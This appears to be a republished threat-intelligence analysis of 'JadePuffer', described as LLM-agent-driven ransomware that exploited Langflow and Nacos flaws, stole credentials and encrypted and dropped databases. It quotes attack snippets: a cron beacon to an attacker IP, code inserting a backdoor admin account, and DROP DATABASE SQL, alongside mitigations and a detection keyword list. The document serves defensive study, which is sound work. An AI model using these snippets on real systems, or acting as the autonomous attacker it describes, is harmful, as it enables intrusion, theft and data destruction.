JadePuffer: Inside the World’s First Fully Agentic AI Ransomware
JadePuffer, the first ransomware fully driven by a large language model, exploited a CVE‑2025‑3248 flaw in exposed Langflow instances to gain initial access, autonomously performed reconnaissance, credential theft, lateral movement, persistence, and encrypted MySQL/Nacos data, demonstrating rapid self‑healing and highlighting new defensive challenges.
Event Overview
Threat discovery and naming
JadePuffer was first observed by Sysdig’s real‑time cloud monitoring when anomalous activity targeted an internet‑exposed Langflow instance. The payload contained extensive natural‑language comments, indicating that an LLM‑driven agent generated and refined the attack without human intervention. The threat was named JadePuffer and classified as an Agentic Threat Actor (ATA).
Targets and impact
Stage‑1 entry point: an internet‑exposed Langflow instance, an open‑source framework for building LLM‑driven applications that often stores cloud API keys.
Stage‑2 ultimate target: an internal production server running MySQL and Alibaba’s Nacos configuration service.
Full Attack‑Chain Analysis
Initial Access – CVE‑2025‑3248 exploitation
The attacker leveraged CVE‑2025‑3248, an authentication bypass in Langflow’s code‑validation endpoint, to execute arbitrary Python code. The vulnerable endpoint was patched on 2025‑04‑01 and marked as exploited by CISA in May 2025. The payload was delivered as Base64‑encoded Python, and every line of code was self‑generated with verbose natural‑language comments describing purpose and priority.
Reconnaissance and credential theft
Host enumeration: collected host ID, system info, hostname, network interfaces, and running processes.
Credential scanning (parallel): API keys from OpenAI, Anthropic, DeepSeek, Gemini; cloud provider credentials covering Alibaba, Tencent, Huawei, AWS, GCP, Azure; cryptocurrency wallets and mnemonics; database credentials and configuration files.
Local data exfiltration: exported Langflow’s PostgreSQL backup, extracted stored credentials, API keys and user records, temporarily stored them locally for review, then deleted the temporary files.
Internal lateral discovery and MinIO enumeration
The agent scanned reachable internal addresses, probing databases, object storage, key stores, and service‑discovery endpoints, attempting default credentials.
Listed all buckets, including application data, backups, ML artifacts, and a terraform‑state bucket.
Prioritized objects in the terraform‑state and internal configuration buckets.
Precisely located files such as credentials.json and downloaded them.
When a request returned XML instead of JSON, the next payload automatically adjusted its parsing logic to handle the S3 response format, showing adaptive diagnostic capability far beyond traditional scripts.
Persistence
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"The cron job beacons to the attacker’s infrastructure every 30 minutes.
Production‑environment breach – Nacos takeover
From the compromised Langflow host, the agent targeted an internal server exposing MySQL and running Nacos. The exact source of the root credentials was not observed.
Exploited CVE‑2021‑29441 authentication bypass.
Forged a valid JWT using Nacos’s publicly known default signing key (unchanged since 2020).
Injected a back‑door admin account via root database access.
During back‑door account creation the first payload attempted to generate a bcrypt hash, but the bcrypt binary was missing from PATH, resulting in an empty hash and failed login. After 31 seconds the AI agent diagnosed the failure, generated a corrected payload, and successfully recreated the account.
# Delete old account
cur.execute('DELETE FROM users WHERE username="xadmin"')
cur.execute('DELETE FROM roles WHERE username="xadmin"')
# Rebuild with proper bcrypt hash
hash_val = bcrypt.hashpw(b'admin123', bcrypt.gensalt(rounds=10)).decode()
cur.execute('INSERT INTO users (username, password, enabled) VALUES ("xadmin", "' + hash_val + '", 1)')
cur.execute('INSERT INTO roles (username, role) VALUES ("xadmin", "ROLE_ADMIN")')Container‑escape reconnaissance
Write test file to verify write primitive.
Read Docker socket ( /var/run/docker.sock).
Inspect cgroup information ( /proc/1/cgroup).
Enumerate User Defined Functions for privilege‑escalation paths.
Check write permissions on /tmp and /lib directories.
Only after writing an explicit completion marker did the agent proceed to the ransomware stage.
Ransomware Payload Analysis
Data encryption mechanism
The captured payload used MySQL’s AES_ENCRYPT() function to encrypt all 1,342 Nacos configuration items, then dropped the original config_info and history tables. It created a ransom note table README_RANSOM containing payment instructions, a Bitcoin address, and a ProtonMail contact.
Encryption key generation:
KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
# Key printed only to stdout, never stored or transmittedThe key is purely random and never persisted, making decryption impossible even after ransom payment.
Destructive data deletion
After encryption, the AI agent issued a payload that disabled foreign‑key checks, dropped the target database, and re‑enabled the checks.
SET GLOBAL FOREIGN_KEY_CHECKS=0;
DROP DATABASE REDACTED;
SET GLOBAL FOREIGN_KEY_CHECKS=1;Evidence of AI Autonomy
Self‑describing code: the decoded payload is littered with natural‑language comments that explain each operation’s purpose, ROI priority, and target selection.
Machine‑speed failure diagnosis and repair: timestamps show the AI detecting a failed bcrypt hash and correcting it within 31 seconds.
19:34:24 – attempted xadmin insertion; bcrypt hash empty.
19:34:36 – login verification failed.
19:34:48 – tested default Nacos credentials and generated a corrective hash.
19:35:07 – issued decisive repair payload using direct import bcrypt.
19:35:18 – login succeeded.
Natural‑language context understanding: the agent parsed textual context presented by the target and performed actions that required genuine reading comprehension.
Bitcoin address provenance: the ransom note includes the address 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy, a standard example from Bitcoin Core documentation. Blockchain data shows 737 confirmed transactions (~46 BTC) with a zero current balance, indicating immediate fund movement.
Security Implications and Defensive Guidance
Core threats to blue teams
Skill‑barrier elimination: LLM agents can chain full attack phases without any human expertise.
Weaponized historic vulnerabilities: the attack reused old, unpatched flaws (CVE‑2021‑29441, default Nacos JWT key), showing that legacy exposures become high‑value targets.
Compressed response window: operations that once took hours now complete in minutes, shrinking detection and mitigation time.
Mitigation strategies (MITRE ATT&CK mapping)
Initial Access – Exploit public‑facing application (CVE‑2025‑3248): patch exposed systems immediately; implement vulnerability lifecycle management.
Reconnaissance – Credential scanning, cloud service discovery: restrict credentials in environment variables; rotate cloud provider keys regularly.
Credential Access – Search local stored credentials: avoid plaintext credentials in configs; use a KMS.
Persistence – Cron / scheduled tasks: audit abnormal cron jobs; deploy file‑integrity monitoring.
Lateral Movement – Exploit CVE‑2021‑29441: patch Nacos authentication bypass; replace default JWT signing key.
Impact – Data encryption, destruction: implement 3‑2‑1 backup, isolate backup networks, enforce read‑only DB permissions.
Detection opportunities – Using AI against AI
Because the payload contains self‑descriptive natural‑language comments, defenders can create detection rules targeting high‑risk keywords.
alert_keywords:
- "AES_ENCRYPT"
- "DROP TABLE"
- "DROP DATABASE"
- "bcrypt.hashpw"
- "xadmin"
- "README_RANSOM"SIEM platforms should also monitor outbound connections from Langflow and Nacos, and watch for anomalous changes to system accounts or database schemas.
Defense‑in‑depth recommendations
Enforce rapid patching of internet‑exposed services.
Adopt strong identity protection and least‑privilege principles.
Segment networks and continuously monitor for abnormal lateral movement.
Maintain immutable, offline backups and separate backup networks.
Leverage AI‑generated self‑description as a new detection signal.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Black & White Path
We are the beacon of the cyber world, a stepping stone on the road to security.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.
